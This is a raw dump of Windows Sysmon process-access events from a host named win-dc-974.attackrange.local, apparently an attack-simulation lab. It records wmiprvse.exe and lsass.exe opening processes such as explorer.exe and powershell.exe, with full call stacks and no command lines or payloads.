16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-79AA-00000000AD01}13796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-77AA-00000000AD01}11936C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 